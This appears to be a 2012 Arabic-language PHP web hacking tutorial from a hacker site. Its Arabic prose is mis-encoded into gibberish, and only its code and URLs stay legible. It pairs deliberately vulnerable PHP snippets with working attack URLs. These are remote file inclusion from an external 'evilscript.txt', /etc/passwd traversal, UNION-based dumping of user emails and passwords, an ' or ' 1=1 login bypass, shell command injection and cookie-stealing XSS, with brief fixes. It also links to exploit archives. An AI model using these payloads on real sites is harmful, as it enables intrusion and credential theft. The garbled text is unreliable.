http://www.the-code.

tk



 

 
2012   

(Adel SBM)

www.the-code.tk

Adel SBM : #$%&

http://www.the-code.tk

$' * ')( +,

6  5; 8, -$)./ 1 23.1 -45) 6)7 8

>15/71
>G$G -H5) DF D , $A 2B ?8( 1
.. D'5 D7 I/ J$
.M/, DH 23 F/

:
Bek4ever-ahmed.bak-THe Don :  
    

:*+ ,- 
Indoushka Over-X - Ayme NDz

:*:;http://www.noor7.com/
http://www.4algeria.com/vb
http://www.sa-hacker.com/vb/
http://www.gaza-hacker.com/cc

NJ.
2011/10/23

http://www.the-code.tk

:FP
>1DG1 (
F;R3 2 T( 1
:(D$7, #/1  D )Remote File Inclusion V (2
2 1 -- 1-2
DG1 1 -- 2-2
-$H> $P$ -- 3-2
:(2/R1 #/1 6$)R&/H/# )Local File Disclosure/Download V (3
2 1 -- 1-3
DG1 1 -- 2-3
-$H> $P$ -- 3-3
:(3$l D5H (G') SQL Injection V (4
2 1 -- 1-4
DG1 1 -- 2-4
(5pD 6$.+& .& ) SQL Injection Login Bypass-- 3-4
-$H> $P$ -- 4-4
:(1T 8$Pv&) Remote Command Execution V (5
2 1 -- 1-5
DG1 1 -- 2-5
-$H> $P$ -- 3-5
:(JAVA SCRIPT HTML 5( G') Cross-Site Scripting V (6
2 1 -- 1-6
-$H> $P$ -- 2-6
(3$l D5H )> F) P/) H 6$)R&) Download Backups+ INC files V (7
>/1+ -- 1-7
-$H> $P$ -- 2-7
:(>)R -H51 (1) 5' >/1( 8
>)&p (

http://www.the-code.tk

:>1DG1
$ > ( -)+3 1 PHP >.1l 53  ) >/)R  (1 vv?)& 2p )H5-
).
' 2B ?P3 ($8 ). ') 3 6?B I  )F1  F53 F.1,B.
 FB 5 7 1 ,...D$G7
2B? (1 $) 3&51 P -H?F ; D v ?$ 1( )AB ($ 28). ?R # )15/7 p> )$B /7 , lB PHP ?P5 ,
 .5/   >G.
(1 DB & D.v+ & /)D+ (1' #?& 2? D & 6+.
2B 2v3T8 ? % >$P$  ..F
5?$  >/1%, 15D1 >$ . 1 53 >1DG1 >/1

http://www.the-code.tk

F;R3 2 T( 1
7 1 M$l& MySQL PHP D 13, M$l& 5 IT 5A 8 2B v1 5/)
.3JF; I/ LOCALHOST (2/R) A )2/R) B+,
D7 7, ;. M$l D7, )6$l I/ APPSERVE WAMP 13, M$l& v?)
I R& / T php.ini (5? #/1 6D7,  2/R) A I/ >$+l
.$R 6?, FG$l 
: 2/ ) 5?& $R, FD php.ini #/1 2B >$ 15/7) ( R,

safe_mode = off
register_globals = on
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
short_tag_open = on
display_errors = on
disabled_functions = N/A
1, #/A1 6lH (1 F1DA 3$, DH 3 : >$& 5A l& . 6D7 D7,
. ,?+, 7 1 PHP
.P)> 5, lp, H -5 D1 > 2B D,> P/A1 ,? MlV $3V
http://www.the-code.tk/code.php?id=96 :v D.& APPSERVE WAMP 13, 6$)R& ,
!!! 5' $  3... ,?+ 8 > 2vv?) #$ : 6N+& M3 .F..D$    I /v3 $ /G&  5H

http://www.the-code.tk

:(D$7, #/1  D )Remote File Inclusion V (2

 5?& 1 l 2> $;p P/1 D( 1 v?)& F3 $R, D; 4  8
.;F)/ >l+v, p ,?
.F$( $.1l)( P  3 $' Fv?  p( 1 l7& F3 ) : 2  DR& DH 2 #/) D> $/) ;&  Fv?)  V D;5& PHP > 2B
require require()
require_once
include
include_once
: 5 ( 2 1 -- 1-2
:2 5? 5R test.php #/1 vD  Pv --

<?php
$pagina=$_GET['pagina'];
include $pagina;
?>
5? )N PHP > 2B $) $pagina $) 2D+& include >D. p, 5? v
(PHP $ 7, I -;& 2p $/) $ D J1, H5l+1
http://127.0.0.1/test.php M33 P), RP& #/) -B, v)H : >RP 2B p D 5;' v
:(WAMP p 6)7 3 )%A 8 61

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

.include >D/ >l+v, B71 $ 5F.1 J $pagina $) 5 %A lp M,? 6/ , 5?& 2( R3 DR3 >)$H $) 273 1Dv 5? 
:6? 8F, P)> 5, 8 5?

http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt?
-4 F)( 1  TXT 23 #/1 >$, 5? . D & 8 6 I+v&
. ,> F3 2B FP> 1
,> F3 2B 00  FP> 1 -4 . )5/N+ $?

http://www.the-code.tk

: )8 p (1 FP? >,;-

<?php
$pagina=$_GET['pagina'];
include $pagina.'.php';
?>
: (FP> 1 -4 D,) 6 v$D -http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt
http://the-code.tk/evilscript.txt.php v 6)$ D T .v (
B4 51 6.&  2? , D7,  FP> 1 00 #$3 5 8
.6 F$ ,> $/) .v 2, ID+) $) D7, 5?& 2

: 5 ( DG1 1 -- 2-2

.M,? (1 1
:(index.php #/1) )5?( 1 #G1 -

if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
>)$H /$ 15) ;F)" main_content" $)> 5, 6 2D+3  vv?)
REQUEST / > 6P, $)/ DR
http://127.0.0.1/index.php?main_content=http://the-code.tk/evilscript.txt?

:2& 5?$ 

..v, 6 D $ 2,

6G3 55&, " HTTPS" DA .3 " )?( HTTP" 6lG& 5v 7, :>'1
"FTP"P/)

http://www.the-code.tk

:-$H> $P$ 3-2

.$) 2B "/" 61 17 51 DA, )+& - : >$+, 
.>B71 $) 6 67.&  ' pT ( R,-

#/1 6$)R&/H/# )Local File Inclusion/Download V (3

:(2/R1
.F/$)R& I' DF+) -H5) P/1 5R1 H v?) 8 p (1 3B >+, 6?,
: P/) G,  )+& 2 D 7,
file_get_contents : 61 #/1 H
readfile :#/1 H
file : >B5P1 2B 1 61 #/1 H
fopen : , #/1 B
highlight_file() - show_source : #/)> RP 5-5R1/5 

: 5 ( 2 1 -- 1-3

:2 5? 5R test.php #/1 vD  Pv --

<?php
$pagina=$_GET['pagina'];
readfile($pagina);
?>
$pagina $), DR) #/) 5R1 H readfile >D R . p, 5? v
R$ R> 7$l, A) &H )#/) +1 DDR, 5Gv 2B 2,
Dv) >l+v, config.php #/1 61 p 15/71 5R& 2)> F) P/) H
: vBulletin
:6? 8F, 5?$ 

http://127.0.0.1/test.php?pagina=../../../../../etc/passwd
..A( 1 D $  G/ #/) / $ 2,
. M,?+ 35?1 +' $ &H )#/) +1 2 ../../../../../etc/passwd

http://www.the-code.tk

: 5 ( DG1 1 -- 2-3

download.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -

$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];

header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();
2B F 8 .$ _REQUEST >5, l/ &( 1 $ 5 5/) #/) ( l7 $file $)
.T +
.#/) 5R1 3  vv?) readfile () >D ( 
: 2 5? 2,
http://127.0.0.1/download.php?file=../../../../../../etc/passwd
..v, 5/) #/) H (1 (?)3 I'

:-$H> $P$ 3-3

.$) 2B "/" 61 17 51 DA, )+& - : >$+, 
.>B71 $) 6 67.&  ' pT ( R,.

http://www.the-code.tk

:(3$l D5H (G') SQL Injection V (4

FT F3>  ) $'3 (1 7T l7&  3 T 2 SQL Injection V
D. DDR& (1 >D, F& 2B $HD> HD, F' , R+& D'5 8
-B( 1 v?)& 2> 1DG) 6' )V (1  3$l A I 5> ,) D)T
.6
: 5 ( 2 1 -- 1-4
test.php #/1 (1 (1 #G1 --

<?php
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
D3 2 SQL 1( GR3  )?( v3 2v7 8 /P1 $ $id $) B '3 )
/P1 $, DH 81 6N+& DH
1H $> P/A1 51 SQL 1 5? )?( vGR3 8 5? 2 /P( 1 /P1 $.3$l DG ;5& 1 6)& D, 51 8 GB
: p, 5; ( #?> $P$ 1 8 ' D ' J1 2B 6)& >)$H $id $)  5 $/1 6> 5F+ > 2B 1T
:6? 8F, 5? )?( 8 %A  F+& 2 3$l DH 2B /p l+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near 'ORDER BY `date` DESC' at line 1
.p $ D F %A >
:2/ ) 5?>  $P$ I 573http://127.0.0.1/test.php?id=1+union+all+select+1,2,version(),4-.(3 H 5)7 2B >, )3$l DH D I/ 6Rv v

http://www.the-code.tk

: 5 ( DG1 1 -- 2-4

listing_view.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -

$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals
where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
. /P1 $ Fl/v 2)> $G itemnr /> 5, $id $))> $H D,DR& $ 3' 3
: 2&T>  5F 6?, SQL ( G' (1 (?)v 2,
http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,
3,concat(0x3a,email,password),5,6,7,8,9,10+from+users-.($1DA+) D.( 1 )> )/ 23 ?Dl I/ 6Rv
6)) 6$P, F' 2vv?) 8 DG( 1 2 SQL Injection :>1> '1
/P 2A& (1 6$P& 6 6)$  8 5' 1 , D% * 
.6 -B I 5 15/7) A I
:(5pD 6$.+& .& ) SQL Injection Login Bypass --3-4

SQL V (1 J. FPv 8 F+l   6); #p( 1 l7& 8
' or ' 1=1 J1) 7+1 '> 5 I 5pD( 1 v?)& 2 Injection
: )I/ J
login.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -

$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND
password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");

http://www.the-code.tk

: >$ 15/7) -4 .), 5pD'> 5 .& vv?)

: DA+)
: +)> /

admin ' or ' 1=1

jocker

>+l 8F, SQL DAv 6 v5p 6.+$ #$ 5Gv v3 D$

: l+ 7v SQL (  1 l$ 8 1T v' 5 v3T 73 2> ,;

$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND
password = ' jocker'")
8 1T( &;)> 1 (?)& 2? 3$l D5H -1 617> G ( ?B D 5?& . .DF  5? . 5pD  /7 -1 5pD( 1 v?)& SQL , vDp
: -$H> $P$ 4-4
: )8 1 DA, 1H GB F/7; $) 2B R/ )+& $id=(int)$_GET['id'];
: 3$l DG /p DR& 2> A R -v), H -,.()'"_+/*

:(1T 8$Pv&) Remote Command Execution V (5

 )+& 2 Remote file Inclusion V D7, V p 23V 2 +' #v& 8. B$+ I/ l1 1 8$Pv,

: 2 1T $l,  )+& 2 D 7, D;5& PHP > 2B-

exec
passthru
shell_exec
system
>.$3 D1 v?) 3B EXEC() >D, 1T $l& l   : >'1 -.-l& F3( 1T 8$Pv&  (? )1T

http://www.the-code.tk

: 5 ( 2 1 -- 1-5

test.php #/1 (1 #G1 --

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
$cmd >R 8 2B 5 $)/ >)$H / vv?) #$ vB >G,+ >  p (1
: 2&T   67.3  vv?) v1
http://127.0.0.1/test.php?cmd=id
.>.$v F& 5( B+ I/ v&$'  1 )id 1T 8$Pv& $
7 )dir 1T Dv5 3 1( 1 1T 5?$ 2/R) B+ I/ . '> 2B
.(2R D/.) P/1
: 5 ( DG1 1 -- 2-5
dig.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -

$ns = $_GET['ns'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig $ns </u></b><br>");
echo '<pre>';
system ("$ns");

$ns $) p (1 D 1 ;5 ; F)/ (?) 3 F v

: 2& 6?, ;5$ 1T
http://127.0.0.1/dig.php?ns=ls -la

:6? 8F, 5 vB 5 : >1> B4-

http://www.the-code.tk

$dz = $_GET['ns'];
$alg = $_GET['alg]; .
........................ etc ........................
system ("dig @$dz $alg");
?>

5?$ #$ 2B
:6? 8F, 5?$ :>,;

http://127.0.0.1/dig.php?dz=|| id ||&alg=ls -la

.D' MH 2B 1 D $l DA+ || J1 T

:(JAVA SCRIPT HTML 5( G') Cross-Site Scripting V (6

l 2B D.& )?( D; v1 2FB 8F F35v  8 5.1l) 6. 1 $
.>$> G, F I/ ;F) DH 2B ()?& F$7B (? >$)7 -H5)
: 2&T   67.3  vv?) v1
: 5 ( 2 1 -- 1-6
test.php #/1 (1 (1 #G1 -: )5?( 1 #G1 -

<?php
$name=$_GET['name'];
print $name;
?>
print >D> 5, l V (1 $name $)/ >)$H /  3B 5? v);& 5
:6? 8F, M,? B; 5( GR3 5  1 ....... 5? 8>  G 2B D$; ?Pv -

http://127.0.0.1/test.php?name=<script>alert(document.cookie)</script>

8 2B v, A J$5? 5 DA+) J$5 5R& B; > 8B3 5F 5? >.$v
.>R

http://www.the-code.tk

p $P& V J$5? A 5 5R ,( 5?& >$/) l & p  D' I 6 , >A J$5? 15/71 B ,/ >$R P& Dv . >$R I 
.>H+) J$5? 15/71 +1 >$R +' I 5pD, 5G $pT 8; F)

: -$H> $P$ 2-6

htmlspecialchars()
 htmlentities() >) 7 vv?) $' D; >/F -$H> G
. v HTML 5 53 >/17), 5G& D 8
:6? 8F, 5?$ -H) 5? 2,

php?>
;(['name=htmlentities($_GET['name$
;print $name
<?

:INC files V + Download Backups V (7

: >/1+ 1-7
:$R, ($.1l)/ >;+ pT( 1 )l $A

-H5) 3$, DG >$$' +v 6$)R,  )+& : Download Backups V
.DF+)
:$+, 1
http://127.0.0.1/adminpanel/phpmydump.php

( ))?( 1 > B5?1 5?& 2 inc P/1 7, G,  )+& : INC files V
.DF+) -H5) 15/71 5R&
:(3$l DG,  &15/71 5R #/1 H) $+, 1
http://127.0.0.1/inc/mysql.inc

: -$H> G 2-7

http://www.the-code.tk

65R> $$'> A+v 6$)R& D 8 5 D)( 1 GR : Download Backups

.>$$' +v)> R 3 D; DA %p >RP I
>$, P/1 2B 15/7) P' 5 6BT .htaccess DA, P/) ')> : INC files
.PHP

:(>)R -H51 (1) 5' >/1( 8

Remote File Inclusion V (1
http://www.1337day.com/exploits/14932
Local File Disclosure/Download V (2
http://www.1337day.com/exploits/17087
SQL Injection V (3
http://www.1337day.com/exploits/17021
http://www.1337day.com/exploits/14836
http://www.1337day.com/exploits/14828
Remote Command Execution V (4
http://www.1337day.com/exploits/1503
Cross-Site Scripting V (5
http://www.1337day.com/exploits/17073

http://www.the-code.tk

:>)&p
8 6>  ?( $P$ 5A $' (1 #/A& ( 1 53 D D;5& 3 7)( 1
3 D( )1   I  ,H M 'DG 2p, N; F) DH I/ D)7
I/ p 2v1 238 ...( '1 >1DG1 >/'1 I M/) /  DF;) /
...6; J * ?)B 5+1 I/ 2N1 5Rv 5+)

5; ? 5' ?&+P'&? H&? G$/7

:23 ?Dl l 2/1
Madrido.Jocker@gmail.com
: -H5)  I;
http://www.the-code.tk
: SKYPE l 65
AdelSBM

http://www.the-code.tk

D5 2 D 5;

2011/10/23

http://www.the-code.tk

Z^] \[